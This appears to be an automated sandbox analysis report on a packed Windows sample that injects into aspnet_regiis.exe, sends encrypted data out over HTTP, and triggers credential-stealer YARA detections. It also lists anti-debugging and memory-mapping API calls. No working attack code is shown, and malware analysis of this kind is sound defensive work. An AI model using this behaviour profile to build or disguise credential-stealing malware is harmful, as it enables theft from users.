                                                                                                                                                                                                                                          2024-12-18 13:47:13 UTC15331OUTData Raw: e1 c1 5e b7 5f 3a bc 2b 1c 44 4f da 4d d7 41 d1 3f 25 6f d4 fc 3d a4 d5 de b5 31 58 7d 33 5c 90 77 7e cf c3 80 b6 4b 98 e7 26 61 39 15 01 b7 0a 6f fc 79 6e b1 3b fc fc 69 60 0e 6a 8b 1e 7e f5 b1 19 55 a5 29 26 1c 50 ef d3 05 46 bf 76 07 ad 04 2c e2 56 75 be 0e 0a 84 84 87 2f 0c 0e f9 20 d8 50 8f 52 69 f1 b2 db 9c 4c 45 19 af c6 27 63 b2 a8 61 ac 9b 92 fa 73 b3 6a 7e 3a 86 c3 74 33 5e bc 38 c5 9c 6e b9 8b 00 c6 26 e9 41 3f 16 af 6f bd 32 e2 45 23 f5 c3 d9 fd 25 5f 33 fb f5 63 b1 07 a8 2a ec b1 c3 e9 a7 3f 32 3d de 87 74 b4 41 b7 37 93 7f 0a 59 b2 66 92 f9 4b de 9b b8 a7 5a 9f 50 a3 df bf fc 68 f8 09 68 a9 3c bc f1 8f dd e3 f4 fc 73 42 ac e1 3d d0 76 76 6f d5 34 9f a2 ec c6 9c e1 86 8c ed 8a 9d 46 81 f9 a2 ee cb ce 8b 4e ab ba 31 dc cd 9c a1 a2 04 d6 96 8e
                                                                                                                                                                                                                                          Data Ascii: ^_:+DOMA?%o=1X}3\w~K&a9oyn;i`j~U)&PFv,Vu/ PRiLE'casj~:t3^8n&A?o2E#%_3c*?2=tA7YfKZPhh<sB=vvo4FN1
                                                                                                                                                                                                                                          2024-12-18 13:47:13 UTC15331OUTData Raw: f7 76 41 bc 7f dc aa bf 6d 3e 68 b1 08 7b 5b fe 08 ea 7a 8b c4 2f 02 4c f5 85 eb 28 b6 34 28 7d 82 4c e9 b1 21 76 bd 42 3d 57 fa 6d c7 ca a6 3c 16 1f ef 14 06 51 9b 25 9f c2 ed de cd 25 32 12 c7 c4 e7 f4 45 42 d7 38 ce d2 60 dd 4d 1d 10 55 08 cc 89 f5 ac bd b6 6e 02 12 02 08 d9 d3 67 d9 26 7e 50 e9 5d ac cf d3 74 e9 db 0e 96 19 4e d9 46 c2 c2 b0 cd 70 55 54 c8 d9 6f d5 97 1f 28 85 7b 6e 96 24 90 d1 d1 06 3c 31 71 17 93 37 cd 8c 51 61 c6 46 88 1c f6 52 75 0a a6 51 af c0 22 34 e8 a9 fa 66 a3 f6 61 66 93 e0 88 09 c9 5c bb 69 b9 4d 4d 5b 95 91 ca cb 9e a7 12 30 0f b1 05 d2 a1 ee 9f 92 0b 12 75 c0 8c c1 08 a7 82 69 8c 9c 3b 40 36 56 d4 9f 12 b3 44 47 96 61 c4 85 5f 2a c2 b8 cd 76 48 4f ad c0 16 52 e9 0b 4b 5d 93 c9 74 d6 7b af c9 d8 83 6d 1c a5 c4 2f 1f 58 bf
                                                                                                                                                                                                                                          Data Ascii: vAm>h{[z/L(4(}L!vB=Wm<Q%%2EB8`MUng&~P]tNFpUTo({n$<1q7QaFRuQ"4faf\iMM[0ui;@6VDGa_*vHORK]t{m/X
                                                                                                                                                                                                                                          2024-12-18 13:47:13 UTC15331OUTData Raw: 5b c7 ba 2b dd 3f 99 b5 a0 a2 6c 2a f3 0d 35 fd cd f2 fd db 5d 88 22 d6 73 d5 86 4c 1f 4e 6d c6 b1 9f af 57 9e 67 af df 49 cb 5a 1c 9c 3f 5f 30 18 ec be e4 1b 51 53 3b 3d 7a 72 5c 9f f9 52 f6 89 c2 68 80 df 68 88 8a 70 df 89 a0 fa c8 a7 dc 65 52 88 3e 33 c2 12 19 92 d8 cd e8 1b 5e db 49 63 fa 66 70 22 0e b8 be 6d ac 3d 5f f0 8e a1 1f 52 76 8a 3d b8 e8 7e ab c4 5c f6 b8 c9 97 86 f7 77 b3 6e cd 18 16 04 e0 f3 3a a7 cd 31 0b 9f ec c8 e7 6d 72 13 6a 9e 0a 0e 6d 34 48 0d f7 19 36 b8 e1 17 e6 f1 ac 7b 24 19 3f fb 0a 4b 8b 60 37 7f 58 cb 64 e5 8f 9c da 09 e2 47 3f 43 54 22 43 a3 68 87 50 03 1f b8 09 fd 05 7f 0e fe e7 3e 8b 8d 57 0e 9a f0 78 c7 ca df 26 a7 61 24 64 26 8d 32 0d a0 53 df cf 99 4c b0 b8 86 73 37 92 d9 8b 0a e0 91 c9 d3 dd 21 a2 8a 70 f2 da 4f 40 70
                                                                                                                                                                                                                                          Data Ascii: [+?l*5]"sLNmWgIZ?_0QS;=zr\RhhpeR>3^Icfp"m=_Rv=~\wn:1mrjm4H6{$?K`7XdG?CT"ChP>Wx&a$d&2SLs7!pO@p
                                                                                                                                                                                                                                          2024-12-18 13:47:16 UTC1038INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 18 Dec 2024 13:47:15 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=re1ugbna6iqljketpv7q2umd6v; expires=Sun, 13-Apr-2025 07:33:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ePZMyLypuyfzor7DMzdVKE3KKwgeIAyszg4LIKHVoSl3n2GQsbJThrKDiDOXZOik0bDatxxSGAIWSgwDIdObmvTn1n8DX69wCOAKJULnU4MI4fhhnpBi82xB4H%2BpwjK2BAs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8f3f9a815a23efa3-EWR
                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2023&rtt_var=758&sent=365&recv=615&lost=0&retrans=0&sent_bytes=2835&recv_bytes=590979&delivery_rate=1443400&cwnd=114&unsent_bytes=0&cid=c0558409b81c52ab&ts=2747&x=0"


                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                          Start time:08:46:35
                                                                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe"
                                                                                                                                                                                                                                          Imagebase:0x950000
                                                                                                                                                                                                                                          File size:641'536 bytes
                                                                                                                                                                                                                                          MD5 hash:795197155CA03F53EED7D90A2613D2A7
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                          Start time:08:46:35
                                                                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                          Start time:08:46:35
                                                                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                                                                                                                                          Imagebase:0xa0000
                                                                                                                                                                                                                                          File size:43'016 bytes
                                                                                                                                                                                                                                          MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1965031546.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1921423227.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2014107650.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1967689413.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2021275005.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1966024248.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1921687992.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1964834206.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1866213868.0000000002C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1867576709.0000000002C16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2013964863.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1920704083.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2013739073.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                          Start time:08:47:16
                                                                                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7408 -s 1648
                                                                                                                                                                                                                                          Imagebase:0x9a0000
                                                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:2.5%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:38.2%
                                                                                                                                                                                                                                            Total number of Nodes:68
                                                                                                                                                                                                                                            Total number of Limit Nodes:3
                                                                                                                                                                                                                                            execution_graph 73209 6cde0ada 31 API calls 73233 6cdd7b5b 4 API calls 2 library calls 73234 6cdde15a LeaveCriticalSection 73236 6cde0052 8 API calls CatchGuardHandler 73210 6cdd87d0 6 API calls 4 library calls 73211 6cde15d0 15 API calls 73237 6cde0c4f 36 API calls ___std_exception_copy 73212 6cddb1c8 6 API calls 73239 6cddc146 18 API calls __dosmaperr 73168 6cdc11c0 73180 6cdc11e8 __CreateFrameInfo CatchIt 73168->73180 73169 6cdc7623 73183 6cdd7330 5 API calls CatchGuardHandler 73169->73183 73171 6cdc762d 73172 6cdc6c4b GetCurrentProcess 73172->73180 73173 6cdc6dc3 K32GetModuleInformation GetModuleFileNameA CreateFileA 73173->73180 73174 6cdc6ec2 CreateFileMappingA 73174->73180 73175 6cdc6f20 CloseHandle 73175->73180 73176 6cdc7c6a GetCurrentProcess 73176->73180 73177 6cdc7538 CloseHandle CloseHandle CloseHandle 73177->73180 73178 6cdc6cdb GetModuleHandleA 73178->73180 73179 6cdc7355 VirtualProtect 73179->73180 73180->73169 73180->73172 73180->73173 73180->73174 73180->73175 73180->73176 73180->73177 73180->73178 73180->73179 73181 6cdc73ee VirtualProtect 73180->73181 73182 6cdc7016 MapViewOfFile 73180->73182 73181->73180 73182->73180 73183->73171 73240 6cdc1040 5 API calls CatchGuardHandler 73241 6cdd8b7a 49 API calls 2 library calls 73214 6cdd77f3 30 API calls std::exception::exception 73215 6cdd7af2 21 API calls 2 library calls 73244 6cddf965 33 API calls 2 library calls 73216 6cdddae4 32 API calls 73245 6cde1e60 20 API calls __startOneArgErrorHandling 73217 6cddd59d 20 API calls __freea 73247 6cddad1d 29 API calls 3 library calls 73218 6cdd7896 14 API calls ___std_exception_destroy 73184 6cdc8810 73191 6cdc8869 73184->73191 73185 6cdc903d 73196 6cdd7330 5 API calls CatchGuardHandler 73185->73196 73187 6cdc904d 73188 6cdc8c56 NtQueryInformationProcess 73188->73191 73189 6cdc8ad0 GetModuleHandleW 73195 6cdc7d50 5 API calls CatchGuardHandler 73189->73195 73191->73185 73191->73188 73191->73189 73192 6cdc9058 GetModuleHandleW 73191->73192 73197 6cdc7d50 5 API calls CatchGuardHandler 73192->73197 73194 6cdc8b1e __CreateFrameInfo 73194->73191 73195->73194 73196->73187 73197->73194 73249 6cddfe11 40 API calls 73250 6cddf110 39 API calls 73220 6cddda93 FreeLibrary 73251 6cddc20c 17 API calls 73221 6cddfe8e 7 API calls CatchGuardHandler 73252 6cdd790a GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 73223 6cdd9d83 52 API calls 3 library calls 73254 6cddb53d 7 API calls 73255 6cddd63d 32 API calls 2 library calls 73256 6cdd733e 16 API calls 3 library calls 73226 6cdda9b8 53 API calls 3 library calls 73227 6cddf6af 15 API calls __freea 73228 6cdd79ae 15 API calls ___std_type_info_destroy_list 73229 6cddfda9 6 API calls 73231 6cddd8a7 6 API calls __dosmaperr 73198 6cdd7b22 73199 6cdd7b2b 73198->73199 73206 6cdd7eb9 IsProcessorFeaturePresent 73199->73206 73201 6cdd7b37 73207 6cdd8a7b 10 API calls 2 library calls 73201->73207 73203 6cdd7b3c 73204 6cdd7b40 73203->73204 73208 6cdd8aad 7 API calls 2 library calls 73203->73208 73206->73201 73207->73203 73208->73204
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Handle$CloseFile$Module$CreateCurrentProcessProtectVirtual$InformationMappingNameView
                                                                                                                                                                                                                                            • String ID: #D@M$@$DI5<$DI5<$T-L$T-L$]Vi$i}R$~+5W$T$T$YPG$@\$@\
                                                                                                                                                                                                                                            • API String ID: 3687506085-19812728
                                                                                                                                                                                                                                            • Opcode ID: d6233101f3ac3feba623ba65a76633ba947863e4ec047caeae146660396a6360
                                                                                                                                                                                                                                            • Instruction ID: 5a109a83116fc4826344168578ec3ea29e655a4a998189ff217fc7603735cccf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6233101f3ac3feba623ba65a76633ba947863e4ec047caeae146660396a6360
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56C3EE31B44615CFDF04CF3CC8853D9B7F9AB46315F11928AD868AB6A1D7399A89CF02

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 1099 6cdc8810-6cdc8862 1100 6cdc8869-6cdc8874 1099->1100 1101 6cdc887a-6cdc8887 1100->1101 1102 6cdc8ee5-6cdc8f36 1100->1102 1105 6cdc888d-6cdc889a 1101->1105 1106 6cdc8be3-6cdc8c51 1101->1106 1104 6cdc9150 1102->1104 1104->1100 1108 6cdc8e5e-6cdc8e6d 1105->1108 1109 6cdc88a0-6cdc88ad 1105->1109 1106->1104 1108->1104 1111 6cdc903d-6cdc9057 call 6cdd7330 1109->1111 1112 6cdc88b3-6cdc88c0 1109->1112 1116 6cdc911a-6cdc9121 1112->1116 1117 6cdc88c6-6cdc88d3 1112->1117 1116->1104 1119 6cdc88d9-6cdc88e6 1117->1119 1120 6cdc8f47-6cdc8f57 1117->1120 1122 6cdc88ec-6cdc88f9 1119->1122 1123 6cdc9029-6cdc9038 1119->1123 1120->1104 1125 6cdc8d0e-6cdc8d4f 1122->1125 1126 6cdc88ff-6cdc890c 1122->1126 1123->1104 1125->1104 1128 6cdc8c56-6cdc8cfd NtQueryInformationProcess 1126->1128 1129 6cdc8912-6cdc891f 1126->1129 1128->1104 1131 6cdc8d54-6cdc8d95 1129->1131 1132 6cdc8925-6cdc8932 1129->1132 1131->1104 1134 6cdc8938-6cdc8945 1132->1134 1135 6cdc8f3b-6cdc8f42 1132->1135 1137 6cdc894b-6cdc8958 1134->1137 1138 6cdc8d02-6cdc8d09 1134->1138 1135->1104 1140 6cdc895e-6cdc896b 1137->1140 1141 6cdc8ad0-6cdc8bd2 GetModuleHandleW call 6cdc7d50 call 6cdd80b0 1137->1141 1138->1104 1144 6cdc8fcf-6cdc9018 1140->1144 1145 6cdc8971-6cdc897e 1140->1145 1141->1104 1144->1104 1149 6cdc8984-6cdc8991 1145->1149 1150 6cdc8a85-6cdc8acb 1145->1150 1153 6cdc9149 1149->1153 1154 6cdc8997-6cdc89a4 1149->1154 1150->1104 1153->1104 1156 6cdc89aa-6cdc89b7 1154->1156 1157 6cdc8e52-6cdc8e59 1154->1157 1159 6cdc89bd-6cdc89ca 1156->1159 1160 6cdc90e0-6cdc9115 1156->1160 1157->1104 1162 6cdc9135-6cdc9144 1159->1162 1163 6cdc89d0-6cdc89dd 1159->1163 1160->1104 1162->1104 1166 6cdc901d-6cdc9024 1163->1166 1167 6cdc89e3-6cdc89f0 1163->1167 1166->1104 1169 6cdc9058-6cdc90db GetModuleHandleW call 6cdc7d50 call 6cdd80b0 1167->1169 1170 6cdc89f6-6cdc8a03 1167->1170 1169->1104 1174 6cdc8f5c-6cdc8fca 1170->1174 1175 6cdc8a09-6cdc8a16 1170->1175 1174->1104 1178 6cdc8a1c-6cdc8a29 1175->1178 1179 6cdc8e03-6cdc8e4d 1175->1179 1182 6cdc8a2f-6cdc8a3c 1178->1182 1183 6cdc8d9a-6cdc8db0 1178->1183 1179->1104 1185 6cdc8bd7-6cdc8bde 1182->1185 1186 6cdc8a42-6cdc8a4f 1182->1186 1183->1104 1185->1104 1188 6cdc8a55-6cdc8a62 1186->1188 1189 6cdc8e72-6cdc8ee0 1186->1189 1191 6cdc8a68-6cdc8a75 1188->1191 1192 6cdc9126-6cdc9130 1188->1192 1189->1104 1194 6cdc8a7b-6cdc8a80 1191->1194 1195 6cdc8db5-6cdc8dfe 1191->1195 1192->1104 1194->1104 1195->1104
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?), ref: 6CDC9081
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                                                                                            • String ID: 1L8F$1L8F$A"c$NtQueryInformationProcess$ntdll.dll
                                                                                                                                                                                                                                            • API String ID: 4139908857-439188107
                                                                                                                                                                                                                                            • Opcode ID: 2e419c5f25f74ff71e00304b42fad64605495dde7944a58ef0b9f3df09ec43fb
                                                                                                                                                                                                                                            • Instruction ID: 2b479e42d284dcf8d5d24189cdf096218d89a9d347708b6921fc48f18b033113
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e419c5f25f74ff71e00304b42fad64605495dde7944a58ef0b9f3df09ec43fb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C032F176B04204CFCB04CFBCD9957CE7BF6AB86314F10851AD865DB7A4CA369909CB82
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6CDD7CCD
                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 6CDD7D99
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CDD7DB2
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 6CDD7DBC
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                                                                                                            • Opcode ID: cb0bf5cf38ef149ca31c29f495cbb49bf64e6a64b926c24e3851715335d5b5bd
                                                                                                                                                                                                                                            • Instruction ID: de95943cc402562c8a25ba1b6123d0420ff2a858ff1c4738ee013e41de694c57
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb0bf5cf38ef149ca31c29f495cbb49bf64e6a64b926c24e3851715335d5b5bd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92313675D01318EBDF20DFA0D9487CDBBB8AF08304F1141EAE50CAB250EB70AA848F55
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6CDD77F1,6CDE4934), ref: 6CDD76D6
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 6CDD76DF
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 6CDD76EA
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 6CDD76F1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3231755760-0
                                                                                                                                                                                                                                            • Opcode ID: e45afc1b7426f2e9be632d06f1d034da1576877aeb0cd4d21d9d1e047677aa7f
                                                                                                                                                                                                                                            • Instruction ID: 70f400d81a6fdd2f0ca3e115b74cc2b1243a2bd543411982f4da1863f6c5877e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e45afc1b7426f2e9be632d06f1d034da1576877aeb0cd4d21d9d1e047677aa7f
